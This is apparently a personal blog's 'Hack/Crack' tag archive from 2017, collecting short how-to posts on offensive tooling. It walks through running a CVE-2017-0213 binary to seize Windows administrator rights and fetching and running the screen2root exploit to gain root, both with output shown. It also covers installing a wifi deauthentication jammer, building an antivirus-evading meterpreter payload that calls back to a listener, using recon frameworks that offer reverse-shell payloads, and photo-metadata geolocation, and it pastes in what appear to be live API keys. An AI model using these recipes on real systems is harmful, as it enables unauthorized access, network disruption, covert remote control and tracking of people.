Privilege Escalation on Windows using CVE-2017-0213

Posted in Hack/Crack by nbctcp

SOURCE:

http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10/

You can gain to admin privileges using this utility CVE-2017-0213 downloaded from

x86

https://github.com/WindowsExploits/Exploits/raw/master/CVE-2017-0213/Binaries/CVE-2017-0213_x86.zi

x64

https://github.com/WindowsExploits/Exploits/raw/master/CVE-2017-0213/Binaries/CVE-2017-0213_x64.zip

Affected Products

Product	Version	Update	Tested
Windows 10			√
Windows 10	1511
Windows 10	1607
Windows 10	1703		√
Windows 7		SP1	√
Windows 8.1
Windows RT 8.1
Windows Server 2008		SP2
Windows Server 2008	R2	SP1
Windows Server 2012
Windows Server 2012	R2
Windows Server 2016

STEPS
-login as standard user
-run cmd
> net user
here you have standard privileges
change local administrator password
> net user administrator 1qaz)OKM
Access is denied

Download CVE-2017-0213 utility above, unzip and run

The moment you double click on it, it will automatically open a new command prompt with administrator privileges

change local administrator password again

> net user administrator 1qaz)OKM

The command completed successfully

Tested by me on Windows 7SP1

20Mar2017

TeamViewer installation on Kali

Posted in Hack/Crack, System by nbctcp

-install sddm as default X windows because default X windows in Kali didn’t allow remote TeamViewer without login GUI first

# apt-get install sddm

# dpkg –add-architecture i386

# apt-get update

# wget http://download.teamviewer.com/download/teamviewer_i386.deb

# dpkg -i –force-depends teamviewer_i386.deb

# apt-get install -f

# teamviewer –daemon start

-get current TeamViewer id either from GUI or CLI

# teamviewer –info print version, status, id

TeamViewer 12.0.71510 (DEB)

teamviewerd status ● teamviewerd.service – TeamViewer remote control daemon

Loaded: loaded (/etc/systemd/system/teamviewerd.service; enabled; vendor preset: disabled)

Active: active (running) since Sun 2017-03-19 09:02:02 PDT; 9min ago

Process: 1140 ExecStart=/opt/teamviewer/tv_bin/teamviewerd -d (code=exited, status=0/SUCCESS)

Main PID: 1162 (teamviewerd)

Tasks: 12 (limit: 4915)

CGroup: /system.slice/teamviewerd.service

└─1162 /opt/teamviewer/tv_bin/teamviewerd -d

Mar 19 09:02:00 kali2 systemd[1]: Starting TeamViewer remote control daemon…

Mar 19 09:02:02 kali2 systemd[1]: Started TeamViewer remote control daemon.

TeamViewer ID: 798024234

-run teamviewer gui

# teamviewer

click Connection/Setup Unattended Access

click Next

click Finish

Now you can remotely connect to your Linux TeamViewer

NOTE:

-every time you adding device or login to new device while login to your TeamViewer a/c. TeamViewer will ask your permission by sending an email with title “Device authorization needed”

Just click a link in that email to add your device into your TV a/c

15Mar2017

Installing Wifi Jammer on Kali

Posted in Hack/Crack by nbctcp

SOURCE: https://github.com/DanMcInerney/wifijammer

Continuously jam all wifi clients and access points within range.

-connect your Atheros or Ralink card

-check wlan0 is on

# ifconfig wlan0

# cd /root

# git clone https://github.com/DanMcInerney/wifijammer.git

# cd wifijammer/

# ./wifijammer.py

This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through.

Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses.

# ./wifijammer.py -a 00:0E:DA:DE:24:8E -c 2

Deauthenticate all devices with which 00:0E:DA:DE:24:8E communicates and skips channel hopping by setting the channel to the target AP’s channel (2 in this case)

# ./wifijammer.py -c 1 -p 5 -t .00001 -s DL:3D:8D:JJ:39:52 -d –world

-c, Set the monitor mode interface to only listen and deauth clients or APs on channel 1

-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP

-t, Set a time interval of .00001 seconds between sending each deauth (try this if you get a scapy error like ‘no buffer space’)

-s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a certain MAC address is handy in case you want to tempt people to join your access point in cases of wanting to use LANs.py or a Pineapple on them.

-d, Do not send deauths to access points’ broadcast address; this will speed up the deauths to the clients that are found

–world, Set the max channel to 13. In N. America the max channel standard is 11, but the rest of the world uses 13 channels so use this option if you’re not in N. America

# ./wifijammer.py -m 10

The -m option sets a max number of client/AP combos that the script will attempt to deauth. When the max number is reached, it clears and repopulates its list based on what traffic it sniffs in the area

14Mar2017

Installing Websploit on Kali

Posted in Hack/Crack by nbctcp

SOURCE: https://sourceforge.net/projects/websploit/

WebSploit Advanced MITM Framework

[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service

[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin

[+]format infector – inject reverse & bind payload into file format

[+]phpmyadmin Scanner

[+]CloudFlare resolver

[+]LFI Bypasser

[+]Apache Users Scanner

[+]Dir Bruter

[+]admin finder

[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks

[+]MITM – Man In The Middle Attack

[+]Java Applet Attack

[+]MFOD Attack Vector

[+]ARP Dos Attack

[+]Web Killer Attack

[+]Fake Update Attack

[+]Fake Access point Attack

[+]Wifi Honeypot

[+]Wifi Jammer

[+]Wifi Dos

[+]Wifi Mass De-Authentication Attack

[+]Bluetooth POD Attack

# cd /root

# git clone https://github.com/websploit/websploit.git

# cd websploit

# ./wsf-update.py

# ./websploit

( ( ) ( )

)\))( ‘ ( ( /( )\ ( ( /(

((_)()\ ) ))\ )\()) ( ` ) ((_) ( )\ )\())

_(())\_)() /((_)((_)\ )\ /(/( _ )\((_)(_))/

\ \((_)/ /(_)) | |(_)((_)((_)_\ | | ((_)(_)| |_

\ \/\/ / / -_) | ‘_ $_-<| ‘_ $| |/ _ \| || _|

\_/\_/ \___| |_.__//__/| .__/ |_|\___/|_| \__|

–=[WebSploit Advanced MITM Framework

+—**—==[Version :3.0.0

+—**—==[Codename :Katana

+—**—==[Available Modules : 20

–=[Update Date : [r3.0.0-000 20.9.2014]

wsf > help

Commands Description

————— —————-

set Set Value Of Options To Modules

scan Scan Wifi (Wireless Modules)

stop Stop Attack & Scan (Wireless Modules)

run Execute Module

use Select Module For Use

os Run Linux Commands(ex : os ifconfig)

back Exit Current Module

show modules Show Modules of Current Database

show options Show Current Options Of Selected Module

upgrade Get New Version

update Update Websploit Framework

about About US

wsf > upgrade

[*]Checking For New Version, Please Wait …

[*]New Version Not Available, This Is Latest Version Of The WebSploit Framework.

wsf > show modules

Web Modules Description

——————- ———————

web/apache_users Scan Directory Of Apache Users

web/dir_scanner Directory Scanner

web/wmap Information Gathering From Victim Web Using (Metasploit Wmap)

web/pma PHPMyAdmin Login Page Scanner

web/cloudflare_resolver CloudFlare Resolver

Network Modules Description

——————- ———————

network/arp_dos ARP Cache Denial Of Service Attack

network/mfod Middle Finger Of Doom Attack

network/mitm Man In The Middle Attack

network/mlitm Man Left In The Middle Attack

network/webkiller TCP Kill Attack

network/fakeupdate Fake Update Attack Using DNS Spoof

network/arp_poisoner Arp Poisoner

Exploit Modules Description

——————- ———————

exploit/autopwn Metasploit Autopwn Service

exploit/browser_autopwn Metasploit Browser Autopwn Service

exploit/java_applet Java Applet Attack (Using HTML)

Wireless / Bluetooth Modules Description

——————- ———————

wifi/wifi_jammer Wifi Jammer

wifi/wifi_dos Wifi Dos Attack

wifi/wifi_honeypot Wireless Honeypot(Fake AP)

wifi/mass_deauth Mass Deauthentication Attack

bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack

14Mar2017

Installing Discover on Kali Linux

Posted in Hack/Crack by nbctcp

SOURCE: http://www.thegeeky.space/2015/04/how-to-save-time-doing-passive-discovery-in-Kali-Linux-using-discover-or-backtrack-script-framework.html

Configuring recon-ng

-register bing_api*

go to https://azure.microsoft.com/en-us/services/cognitive-services/search/ and sign in using your Hotmail or Skype account or create new account

-register builtwith_api* https://api.builtwith.com

d7cfa1da-8bc2-46df-816e-e1fbd888475c

-register facebook_api https://developers.facebook.com

-register fullcontact_api* https://portal.fullcontact.com/signup

574dcf32717c83a9

-register github_api*

-register google_api* https://console.developers.google.com/apis/library

-register google_cse* https://developers.google.com/custom-search/json-api/v1/overview#Pricing

AIzaSyBDUbBRqbI3Oq3zVY34TiYBzzLGjPFsVQ0

-register hashes_api* https://hashes.org/register_form.php

0CImE8MxyVI6ZAoldvGdfNcaLdsXQ8

-register ipinfodb_api http://www.ipinfodb.com/register.php

-register linkedin_api https://developer.linkedin.com

-register shodan_api* https://www.shodan.io//

7Bl9THLHdEEFFyYJy0QOc69CtIEGKGpD

-register with twitter_api https://dev.twitter.com

NOTE:

-api with * is needed

# recon-ng

keys add bing_api <value>

keys add builtwith_api <value>

keys add fullcontact_api <value>

keys add github_api <value>

keys add google_api <value>

keys add google_cse <value>

keys add hashes_api <value>

keys add shodan_api <value>

> keys list

+———————————————————+

| Name | Value |

+———————————————————+

| bing_api | |

| builtwith_api | d7cfa1da-8bc2-46df-816e-e1fbd8884… |

| censysio_id | |

| censysio_secret | |

| flickr_api | |

| fullcontact_api | 574dcf32717c8… |

| github_api | |

| google_api | |

| google_cse | AIzaSyBDUbBRqbI3Oq3zVY34TiYBzzLGjPFs… |

| hashes_api | 0CImE8MxyVI6ZAoldvGdfNcaLds… |

| instagram_api | |

| instagram_secret | |

| ipinfodb_api | |

| jigsaw_api | |

| jigsaw_password | |

| jigsaw_username | |

| linkedin_api | |

| linkedin_secret | |

| pwnedlist_api | |

| pwnedlist_iv | |

| pwnedlist_secret | |

| shodan_api | 7Bl9THLHdEEFFyYJy0QOc69CtIEGK… |

| twitter_api | |

| twitter_secret | |

+———————————————————+

Installing Discover

# cd /root

# git clone https://github.com/leebaird/discover.git

# cd discover

# ./update.sh

# chmod +x /usr/share/theharvester/theHarvester.py

# ./discover.sh

______ ___ ______ ______ _____ _ _ ______ _____

| \ | |____ | | | \ / |_____ |____/

|_____/ _|_ _____| |_____ |_____| \/ |_____ | \_

By Lee Baird

RECON

1. Domain

2. Person

3. Parse salesforce

SCANNING

4. Generate target list

5. CIDR

6. List

7. IP, range, or URL

8. Rerun Nmap scripts and MSF aux.

WEB

9. Insecure direct object reference

10. Open multiple tabs in Firefox

11. Nikto

12. SSL

MISC

13. Crack WiFi

14. Parse XML

15. Generate a malicious payload

16. Start a Metasploit listener

17. Update

18. Exit

Choice:

Domain

RECON

1. Passive

2. Active

3. Previous menu

– Passive uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, multiple websites, and recon-ng.

– Active uses Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute, and Whatweb.

– Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, and Shodan for maximum results with recon-ng.

Person

RECON

First name:

Last name:

– Combines info from multiple websites.

Parse salesforce

Create a free account at salesforce (https://connect.data.com/login).

Perform a search on your target company > select the company name > see all.

Copy the results into a new file.

Enter the location of your list:

– Gather names and positions into a clean list.

SCANNING

Generate target list

SCANNING

1. Local area network

2. NetBIOS

3. netdiscover

4. Ping sweep

5. Previous menu

– Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

CIDR, List, IP, Range, or URL

Type of scan:

1. External

2. Internal

3. Previous menu

– External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.

– Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.

– Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.

– Matching nmap scripts are used for additional enumeration.

– Addition tools: enum4linux, smbclient, and ike-scan.

– Matching Metasploit auxiliary modules are also leveraged.

WEB

Insecure direct object reference

Using Burp, authenticate to a site, map & Spider, then log out.

Target > Site map > select the URL > right click > Copy URLs in this host.

Paste the results into a new file.

Enter the location of your file:

Open multiple tabs in Firefox

Open multiple tabs in Firefox with:

1. List

2. Directories from a domain’s robot.txt.

3. Previous menu

– Use a list containing IPs and/or URLs.

– Use wget to pull a domain’s robot.txt file, then open all of the directories.

Nikto

Run multiple instances of Nikto in parallel.

1. List of IPs.

2. List of IP:port.

3. Previous menu

SSL

Check for SSL certificate issues.

Enter the location of your list:

– Use sslscan and sslyze to check for SSL/TLS certificate issues.

MISC

Crack WiFi

– Crack wireless networks.

Parse XML

Parse XML to CSV.

1. Burp (Base64)

2. Nessus

3. Nexpose

4. Nmap

5. Qualys

6. Previous menu

Generate a malicious payload

MALICIOUS PAYLOADS

1. android/meterpreter/reverse_tcp

2. cmd/windows/reverse_powershell

3. linux/x64/shell_reverse_tcp

4. linux/x86/meterpreter/reverse_tcp

5. osx/x64/shell_reverse_tcp

6. php/meterpreter/reverse_tcp

7. windows/meterpreter/reverse_tcp

8. windows/x64/meterpreter/reverse_tcp

9. Previous menu

Start a Metasploit listener

Metasploit LISTENERS

1. android/meterpreter/reverse_tcp

2. cmd/windows/reverse_powershell

3. linux/x64/shell_reverse_tcp

4. linux/x86/meterpreter/reverse_tcp

5. osx/x64/shell_reverse_tcp

6. php/meterpreter/reverse_tcp

7. windows/meterpreter/reverse_tcp

8. windows/x64/meterpreter/reverse_tcp

9. Previous menu

14Mar2017

Installing SpiderFoot on Kali

Posted in Hack/Crack by nbctcp

SOURCE: http://knoxd3.blogspot.co.id/2013/06/spiderfoot-free-open-source.html

# cd /root

# git clone https://github.com/smicallef/spiderfoot.git

# cd spiderfoot

# apt-get install -y python3-pip python3-setuptools

# pip install bs4 cherrypy cmake lxml M2Crypto mako netaddr openxmllib phonenumbers PyPDF2 runtime simplegexf stem

# pip3 install py2exe

# ./sf.py 0.0.0:5001

-open browser and go to http://serverip:5001

-register yourself to get API on botscout.com, censys.io, cymon.io, hunter.io, ibm.com, malwarepatrol.com, projecthoneypot.org, shodan.io, virustotal.com

-click Settings

set API for BotScout, CenSys, Cymon, , Honeypot Checker, Hunter.io, MalwarePatrol, SHODAN, VirusTotal, XForce Exchange

click New Scan

Result

9Mar2017

Get Metadata of a photo

Posted in Hack/Crack by nbctcp

Download ExifTool from

http://www.sno.phy.queensu.ca/~phil/exiftool/

Download ExiftoolGUI from

http://u88.n24.queensu.ca/exiftool/forum/index.php/topic,2750.0.html

Download sample Canon photo from

http://web.canon.jp/imaging/eosd/samples/eos6d/downloads/01.jpg

unzip exiftool-10.46.zip

rename exiftool(-k).exe to exiftool.exe

move exiftool.exe into c:\Windows

unzip exiftoolgui516.zip

cd exiftoolgui

copy content of jhead_jpegtran into c:\Windows

run ExifToolGUI.exe

If we export metadata into text file. We can find Camera model, date, gps location, etc

—- ExifTool —-

ExifTool Version Number : 10.46

—- File —-

File Name : 01.jpg

Directory : .

File Size : 5.9 MB

File Modification Date/Time : 2017:03:09 19:50:31+07:00

File Access Date/Time : 2017:03:09 19:50:22+07:00

File Creation Date/Time : 2017:03:09 19:50:30+07:00

File Permissions : rw-rw-rw-

File Type : JPEG

File Type Extension : jpg

MIME Type : image/jpeg

Exif Byte Order : Little-endian (Intel, II)

Image Width : 5472

Image Height : 3648

Encoding Process : Baseline DCT, Huffman coding

Bits Per Sample : 8

Color Components : 3

Y Cb Cr Sub Sampling : YCbCr4:2:2 (2 1)

—- EXIF —-

Make : Canon

Camera Model Name : Canon EOS 6D

Orientation : Horizontal (normal)

X Resolution : 72

Y Resolution : 72

Resolution Unit : inches

Modify Date : 2012:08:13 17:34:26

Artist :

Y Cb Cr Positioning : Co-sited

Exposure Time : 1/80

F Number : 8.0

Exposure Program : Aperture-priority AE

ISO : 100

Sensitivity Type : Recommended Exposure Index

Recommended Exposure Index : 100

Exif Version : 0230

Date/Time Original : 2012:08:13 17:34:26

Create Date : 2012:08:13 17:34:26

Components Configuration : Y, Cb, Cr, –

Shutter Speed Value : 1/83

Aperture Value : 8.0

Exposure Compensation : +1/3

Metering Mode : Center-weighted average

Flash : Off, Did not fire

Focal Length : 20.0 mm

User Comment :

Sub Sec Time : 42

Sub Sec Time Original : 42

Sub Sec Time Digitized : 42

Flashpix Version : 0100

Color Space : sRGB

Exif Image Width : 5472

Exif Image Height : 3648

Interoperability Index : R98 – DCF basic file (sRGB)

Interoperability Version : 0100

Focal Plane X Resolution : 3810.584958

Focal Plane Y Resolution : 3815.899582

Focal Plane Resolution Unit : inches

Custom Rendered : Normal

Exposure Mode : Auto

White Balance : Manual

Scene Capture Type : Standard

Owner Name :

Serial Number : 000000000666

Lens Info : 17-40mm f/0

Lens Model : EF17-40mm f/4L USM

Lens Serial Number : 0000000000

GPS Version ID : 2.3.0.0

GPS Latitude Ref : South

GPS Latitude : 20.250243°

GPS Longitude Ref : East

GPS Longitude : 44.419263°

GPS Altitude Ref : Above Sea Level

GPS Altitude : 23.5 m

GPS Time Stamp : 14:31:59

GPS Satellites : 12

GPS Status : Measurement Active

GPS Measure Mode : 3-Dimensional Measurement

GPS Dilution Of Precision : 1.4

GPS Date Stamp : 2012:08:13

Compression : JPEG (old-style)

X Resolution : 72

Y Resolution : 72

Resolution Unit : inches

Thumbnail Offset : 9784

Thumbnail Length : 4017

Thumbnail Image : (Binary data 4017 bytes, use -b option to extract)

—- MakerNotes —-

Macro Mode : Normal

Self Timer : Off

Quality : Fine

Canon Flash Mode : Off

Continuous Drive : Single

Focus Mode : One-shot AF

Record Mode : JPEG

Canon Image Size : Large

Easy Mode : Manual

Digital Zoom : None

Contrast : Normal

Saturation : Normal

Metering Mode : Center-weighted average

Focus Range : Not Known

Canon Exposure Mode : Aperture-priority AE

Lens Type : Canon EF 17-40mm f/4L

Max Focal Length : 40 mm

Min Focal Length : 17 mm

Focal Units : 1/mm

Max Aperture : 4

Min Aperture : 23

Flash Activity : 0

Flash Bits : (none)

Zoom Source Width : 0

Zoom Target Width : 0

Manual Flash Output : n/a

Color Tone : Normal

Focal Length : 20 mm

Auto ISO : 100

Base ISO : 100

Measured EV : 12.75

Target Aperture : 8

Target Exposure Time : 1/81

Exposure Compensation : +1/3

White Balance : Daylight

Slow Shutter : None

Shot Number In Continuous Burst : 0

Optical Zoom Code : n/a

Camera Temperature : 34 C

Flash Guide Number : 0

Flash Exposure Compensation : 0

Auto Exposure Bracketing : Off

AEB Bracket Value : 0

Control Mode : Camera Local Control

F Number : 8

Exposure Time : 1/81

Measured EV 2 : 12.625

Bulb Duration : 0

Camera Type : EOS High-end

ND Filter : n/a

Canon Image Type : Canon EOS 6D

Canon Firmware Version : Firmware Version 4.0.1

Owner Name :

Canon Model ID : EOS 6D

Thumbnail Image Valid Area : 0 159 7 112

AF Area Mode : Single-point AF

Num AF Points : 11

Valid AF Points : 11

Canon Image Width : 5472

Canon Image Height : 3648

AF Image Width : 5472

AF Image Height : 3648

AF Area Widths : 82 82 82 82 98 120 98 82 82 82 82

AF Area Heights : 98 98 98 98 76 127 76 98 98 98 98

AF Area X Positions : -1143 -547 -547 -547 0 0 0 547 547 547 1143

AF Area Y Positions : 0 350 0 -350 488 0 -488 350 0 -350 0

AF Points In Focus : 5

AF Points Selected : 4

Time Zone : +03:00

Time Zone City : Moscow

Daylight Savings : Off

Bracket Mode : Off

Bracket Value : 0

Bracket Shot Number : 0

Raw Jpg Size : Large

WB Bracket Mode : Off

WB Bracket Value AB : 0

WB Bracket Value GM : 0

Live View Shooting : Off

Focus Distance Upper : inf

Focus Distance Lower : 6.01 m

Flash Exposure Lock : Off

Lens Model : EF17-40mm f/4L USM

Internal Serial Number : GD0001833

Dust Removal Data : (Binary data 1024 bytes, use -b option to extract)

Crop Left Margin : 0

Crop Right Margin : 0

Crop Top Margin : 0

Crop Bottom Margin : 0

Exposure Level Increments : 1/3 Stop

ISO Speed Increments : 1 Stop

AEB Auto Cancel : On

AEB Sequence : -,0,+

AEB Shot Count : 3 shots

Safety Shift : Disable

AI Servo Tracking Sensitivity : Standard

Acceleration Tracking : 0

AI Servo First Image Priority : Equal priority

AI Servo Second Image Priority : Equal priority

AF Assist Beam : Emits

Lens Drive No AF : Focus search on

Orientation Linked AF Point : Same for vertical and horizontal

Superimposed Display : On

AF Microadjustment : Disable; 0; 0; 0; 0; 0; 0; 0; 0; 0; 0; 0; 0; 0; 0; 0

Dial Direction Tv Av : Normal

Focusing Screen : Eg-A II

Multi Function Lock : Off; Quick control dial

Viewfinder Warnings : Monochrome, WB corrected

Custom Controls : 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0

Aspect Ratio : 3:2

Cropped Image Width : 5472

Cropped Image Height : 3648

Cropped Image Left : 0

Cropped Image Top : 0

Tone Curve : Standard

Sharpness : 3

Sharpness Frequency : n/a

Sensor Red Level : 0

Sensor Blue Level : 0

White Balance Red : 0

White Balance Blue : 0

Color Temperature : 2500

Picture Style : Standard

Digital Gain : 0

WB Shift AB : 0

WB Shift GM : 0

Measured RGGB : 432 1024 1024 720

Color Space : sRGB

VRD Offset : 0

Sensor Width : 5568

Sensor Height : 3708

Sensor Left Border : 84

Sensor Top Border : 50

Sensor Right Border : 5555

Sensor Bottom Border : 3697

Black Mask Left Border : 0

Black Mask Top Border : 0

Black Mask Right Border : 0

Black Mask Bottom Border : 0

Color Data Version : 10 (1DX/5DmkIII/6D/70D/100D/650D/700D/M)

WB RGGB Levels As Shot : 2072 1021 1021 1694

Color Temp As Shot : 5189

WB RGGB Levels Auto : 2052 1024 1024 1654

Color Temp Auto : 5264

WB RGGB Levels Measured : 2052 1024 1024 1654

Color Temp Measured : 5264

WB RGGB Levels Daylight : 2072 1024 1024 1694

Color Temp Daylight : 5200

WB RGGB Levels Shade : 2389 1024 1024 1427

Color Temp Shade : 7000

WB RGGB Levels Cloudy : 2236 1024 1024 1553

Color Temp Cloudy : 6000

WB RGGB Levels Tungsten : 1477 1024 1024 2521

Color Temp Tungsten : 3200

WB RGGB Levels Fluorescent : 1808 1024 1024 2383

Color Temp Fluorescent : 3720

WB RGGB Levels Kelvin : 1163 1024 1024 3178

Color Temp Kelvin : 2500

WB RGGB Levels Flash : 2305 1024 1024 1515

Color Temp Flash : 6345

Average Black Level : 2047 2047 2047 2047

Raw Measured RGGB : 178884 419622 413164 294229

Per Channel Black Level : 2047 2047 2047 2047

Normal White Level : 14558

Specular White Level : 15070

Linearity Upper Margin : 10000

Picture Style User Def : Auto; Auto; Auto

Picture Style PC : None; None; None

Custom Picture Style File Name :

AF Micro Adj Mode : Disable

AF Micro Adj Value : 0

Vignetting Corr Version : 0

Peripheral Lighting : On

Chromatic Aberration Corr : On

Peripheral Lighting Value : 70

Original Image Width : 5472

Original Image Height : 3648

Peripheral Lighting Setting : On

Chromatic Aberration Setting : On

Peripheral Illumination Corr : Off

Auto Lighting Optimizer : Standard

Highlight Tone Priority : Off

Long Exposure Noise Reduction : On

High ISO Noise Reduction : Standard

Multi Exposure : Off

Multi Exposure Control : Additive

Multi Exposure Shots : 0

Grainy B/W Filter : Off

Soft Focus Filter : Off

Toy Camera Filter : Off

Miniature Filter : Off

Miniature Filter Orientation : Horizontal

Miniature Filter Position : 0

Miniature Filter Parameter : 0

Fisheye Filter : Off

Painting Filter : Off

Watercolor Filter : Off

HDR : Off

HDR Effect : Natural

—- XMP —-

Rating : 0

—- Composite —-

Aperture : 8.0

Drive Mode : Single-frame Shooting

GPS Altitude : 23.5 m Above Sea Level

GPS Date/Time : 2012:08:13 14:31:59Z

GPS Latitude : 20.250243° S

GPS Longitude : 44.419263° E

GPS Position : 20.250243° S, 44.419263° E

ISO : 100

Image Size : 5472×3648

Lens : 17.0 – 40.0 mm

Lens ID : Canon EF 17-40mm f/4L

Megapixels : 20.0

Scale Factor To 35 mm Equivalent: 1.0

Shooting Mode : Aperture-priority AE

Shutter Speed : 1/80

Create Date : 2012:08:13 17:34:26.42

Date/Time Original : 2012:08:13 17:34:26.42

Modify Date : 2012:08:13 17:34:26.42

WB RGGB Levels : 2072 1021 1021 1694

Blue Balance : 1.659158

Circle Of Confusion : 0.030 mm

Depth Of Field : inf (1.64 m – inf)

Field Of View : 84.7 deg

Focal Length : 20.0 mm (35 mm equivalent: 19.7 mm)

Hyperfocal Distance : 1.64 m

Lens : 17.0 – 40.0 mm (35 mm equivalent: 16.8 – 39.5 mm)

Light Value : 12.3

Red Balance : 2.029383

To find exact location, copy GPS Position coordinate and paste into maps.google.com

GPS Position : 20.250243° S, 44.419263° E

4Mar2017

MichaCry an Automatic Pentesting Tools

Posted in Hack/Crack by nbctcp

SOURCE: https://wreckitkenny.net/2017/02/24/michacry-an-automated-pentesting-tools-part-1/#comment-15

# cd /root

# apt-get install figlet -y

# git clone https://github.com/wreckitkenny/MichaCry.git

# cd MichaCry

# chmod +x michaCry.sh personalCom.sh setup.sh webApp.sh wireless.sh

# vi setup.sh

change this part

git clone https://github.com/night-m4t3-t34m/deltax-fluxion.git wireless/fluxion

# vi michaCry.sh

change

espeak

echo

# ./setup.sh

# ./michaCry.sh

20170304 17.15.jpg

2Mar2017

screen root privillege escalation

Posted in Hack/Crack, System by nbctcp

NOTE:

-this exploit will make normal user become root

-tried working with Ubuntu 13.x with old patches but not with Debian 8 or Parrot with latest patches

SOURCE: https://github.com/XiphosResearch/exploits/tree/master/screen2root

If you don’t have screen 4.05 then you need to install or compile yourself

# apt-get install screen

# cd /root

# wget https://ftp.gnu.org/gnu/screen/screen-4.5.0.tar.gz

# cd screen-4.5.0

# apt-get install libncurses5-dev

# ./configure;make;make install

# screen -v

Screen version 4.05.00 (GNU) 10-Dec-16

# su – user1

$ wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/screen2root/screenroot.sh

$ chmod +x screenroot.sh

$ ./screenroot.sh

~ gnu/screenroot ~

[+] First, we create our shell and library…

[+] Now we create our /etc/ld.so.preload file…

[+] Triggering…

‘ from /etc/ld.so.preload cannot be preloaded: ignored.

[+] done!

No Sockets found in /tmp/screens/S-user1.

# whoami

root

27Feb2017

FUD (Fully Un Detectable) Payload with CUSTOM-meterpreter

Posted in Hack/Crack by nbctcp

SOURCE: https://astr0baby.wordpress.com/2016/12/13/windows-2016-server-and-metasploit/

This payload can’t be detected by TrendMicro

# apt-get install mingw-w64

# cd /root

# wget https://github.com/DoktorCranium/metasploit/blob/master/CUSTOM-meterpreter.sh

# chmod +x CUSTOM-meterpreter.sh

# ./CUSTOM-meterpreter.sh

****************************************************************

Automatic C source code generator – FOR METASPLOIT

Based on rsmudge metasploit-loader

****************************************************************

Metasploit server IP : 10.0.1.12

Metasploit port number : 4444

(+) Compiling binary ..

-rw-r–r– 1 root root 2180 Feb 27 00:50 temp.c

(+) -rwxr-xr-x 1 root root 13312 Feb 27 00:50 payload.exe

Nbctcp's Weblog

From Engineer for Engineers

Tag Archives: Hack

Privilege Escalation on Windows using CVE-2017-0213

Affected Products

TeamViewer installation on Kali

Installing Wifi Jammer on Kali

Installing Websploit on Kali

Installing Discover on Kali Linux

Installing SpiderFoot on Kali

Get Metadata of a photo

MichaCry an Automatic Pentesting Tools

screen root privillege escalation

FUD (Fully Un Detectable) Payload with CUSTOM-meterpreter